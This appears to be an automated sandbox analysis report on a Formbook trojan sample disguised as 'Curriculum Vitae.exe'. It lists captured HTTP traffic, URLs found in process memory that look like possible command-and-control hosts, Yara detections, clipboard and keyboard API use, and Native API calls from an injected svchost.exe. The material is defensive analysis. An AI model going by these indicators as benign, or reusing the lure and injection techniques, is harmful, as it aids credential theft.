  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 36 75 32 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /6u21/ was not found on this server.</p></body></html>
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Thu, 29 Aug 2024 10:16:00 GMT
  Server: Apache
  Content-Length: 203
  Connection: close
  Content-Type: text/html; charset=iso-8859-1
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 36 75 32 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /6u21/ was not found on this server.</p></body></html>
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Thu, 29 Aug 2024 10:16:02 GMT
  Server: Apache
  Content-Length: 203
  Connection: close
  Content-Type: text/html; charset=iso-8859-1
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 36 75 32 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /6u21/ was not found on this server.</p></body></html>
            Source: firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/
            Source: firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/195.html
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/196.html
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/197.html
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/198.html
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/199.html
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/200.html
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/201.html
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/202.html
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/203.html
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/204.html
            Source: firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/search.php?act=search
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_system/login.php
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_system/script/c_html_js_add.php
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_system/script/jquery-2.2.4.min.js
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_system/script/zblogphp.js
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_users/theme/yd1125free/script/common.js?v=1.2.4
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_users/theme/yd1125free/script/custom.js?v=1.2.4
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_users/theme/yd1125free/style/css/font-awesome.min.css
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_users/theme/yd1125free/style/css/normalize.css
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_users/theme/yd1125free/style/css/swiper-4.3.3.min.css
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_users/theme/yd1125free/style/images/logo.png
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_users/theme/yd1125free/style/style.min.css?v=1.2.4
            Source: OAIexgManRWDie.exe, 00000007.00000002.3272150093.0000000005258000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mediaplug.biz
            Source: OAIexgManRWDie.exe, 00000007.00000002.3272150093.0000000005258000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mediaplug.biz/13ne/
            Source: regsvr32.exe, 00000006.00000002.3273025695.0000000007F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: regsvr32.exe, 00000006.00000002.3273025695.0000000007F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: regsvr32.exe, 00000006.00000002.3273025695.0000000007F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: regsvr32.exe, 00000006.00000002.3273025695.0000000007F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: regsvr32.exe, 00000006.00000002.3273025695.0000000007F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: regsvr32.exe, 00000006.00000002.3273025695.0000000007F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: regsvr32.exe, 00000006.00000002.3273025695.0000000007F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: regsvr32.exe, 00000006.00000002.3269626827.0000000002E31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: regsvr32.exe, 00000006.00000002.3269626827.0000000002E31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: regsvr32.exe, 00000006.00000002.3269626827.0000000002E31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: regsvr32.exe, 00000006.00000002.3269626827.0000000002E31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033B
            Source: regsvr32.exe, 00000006.00000002.3269626827.0000000002E31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033P
            Source: regsvr32.exe, 00000006.00000002.3269626827.0000000002E31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033t
            Source: regsvr32.exe, 00000006.00000002.3269626827.0000000002E31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033y
            Source: regsvr32.exe, 00000006.00000002.3269626827.0000000002E31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: regsvr32.exe, 00000006.00000002.3269626827.0000000002E31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: regsvr32.exe, 00000006.00000002.3269626827.0000000002E31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: regsvr32.exe, 00000006.00000003.2848830372.0000000007E6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: regsvr32.exe, 00000006.00000002.3273025695.0000000007F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.htmlit.com.cn/
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.zblogcn.com/
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00DAEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00DAEAFF
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00DAED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00DAED6A
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00D9AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_00D9AA57
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00DC9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00DC9576

            E-Banking Fraud

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000006.00000002.3269294970.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3269532701.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.3272150093.00000000051D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3270513157.0000000003000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2666088394.0000000002920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2666668441.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3270554488.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2665951843.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3269294970.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3269532701.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3272150093.00000000051D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3270513157.0000000003000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2666088394.0000000002920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2666668441.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3270554488.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2665951843.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: Curriculum Vitae.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
            Source: Curriculum Vitae.exe, 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_258cfb11-7
            Source: Curriculum Vitae.exe, 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_82407f35-d
            Source: Curriculum Vitae.exe | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_3d479051-6
            Source: Curriculum Vitae.exe | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_a3e369b4-7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042C043 NtClose,2_2_0042C043
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072B60 NtClose,LdrInitializeThunk,2_2_03072B60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03072DF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03072C70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030735C0 NtCreateMutant,LdrInitializeThunk,2_2_030735C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03074340 NtSetContextThread,2_2_03074340
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03074650 NtSuspendThread,2_2_03074650
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072B80 NtQueryInformationFile,2_2_03072B80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072BA0 NtEnumerateValueKey,2_2_03072BA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072BE0 NtQueryValueKey,2_2_03072BE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072BF0 NtAllocateVirtualMemory,2_2_03072BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072AB0 NtWaitForSingleObject,2_2_03072AB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072AD0 NtReadFile,2_2_03072AD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072AF0 NtWriteFile,2_2_03072AF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072F30 NtCreateSection,2_2_03072F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072F60 NtCreateProcessEx,2_2_03072F60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072F90 NtProtectVirtualMemory,2_2_03072F90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072FA0 NtQuerySection,2_2_03072FA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072FB0 NtResumeThread,2_2_03072FB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072FE0 NtCreateFile,2_2_03072FE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072E30 NtWriteVirtualMemory,2_2_03072E30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072E80 NtReadVirtualMemory,2_2_03072E80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072EA0 NtAdjustPrivilegesToken,2_2_03072EA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072EE0 NtQueueApcThread,2_2_03072EE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072D00 NtSetInformationFile,2_2_03072D00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072D10 NtMapViewOfSection,2_2_03072D10
